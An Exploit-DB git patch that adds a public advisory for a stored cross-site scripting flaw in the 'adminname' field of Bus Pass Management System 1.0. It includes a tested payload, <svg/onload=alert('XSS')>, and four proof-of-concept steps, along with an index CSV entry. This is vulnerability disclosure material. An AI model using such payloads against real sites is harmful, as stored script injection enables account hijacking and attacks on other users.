From 99b8f092133fbe41a4e17d4bff846047643619fc Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 10 Sep 2021 05:02:06 +0000
Subject: [PATCH] DB: 2021-09-10

1 changes to exploits/shellcodes

Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
---
 exploits/php/webapps/50272.txt | 22 ++++++++++++++++++++++
 files_exploits.csv             |  1 +
 2 files changed, 23 insertions(+)
 create mode 100644 exploits/php/webapps/50272.txt

diff --git a/exploits/php/webapps/50272.txt b/exploits/php/webapps/50272.txt
new file mode 100644
index 000000000..8b0ca8ba4
--- /dev/null
+++ b/exploits/php/webapps/50272.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
+# Date: 2021-09-08
+# Exploit Author: Emre Aslan
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
+# Version: 1.0
+# Tested on: Windows 11 - XAMPP Server
+
+# Vulnerable page: host/admin/*
+
+# Vulnerable Code: <div class="user-info"><div><strong>Admin[PAYLOAD]</strong></div>
+
+# Vulnerable Parameter: adminname[ POST Data ]
+
+# Tested Payload: <svg/onload=alert('XSS')>
+
+# Proof Of Concept:
+
+# 1 - Login the dashboard
+# 2 - Go to /admin/admin-profile.php
+# 3 - set admin name with payload
+# 4 - xss fires
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 77fa2ada2..a909c6204 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44393,3 +44393,4 @@ id,file,description,date,author,type,platform,port
 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php,
 50270,exploits/php/webapps/50270.txt,"WordPress Plugin TablePress 1.14 - CSV Injection",1970-01-01,"Nikhil Kapoor",webapps,php,
+50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",1970-01-01,"Emre Aslan",webapps,php,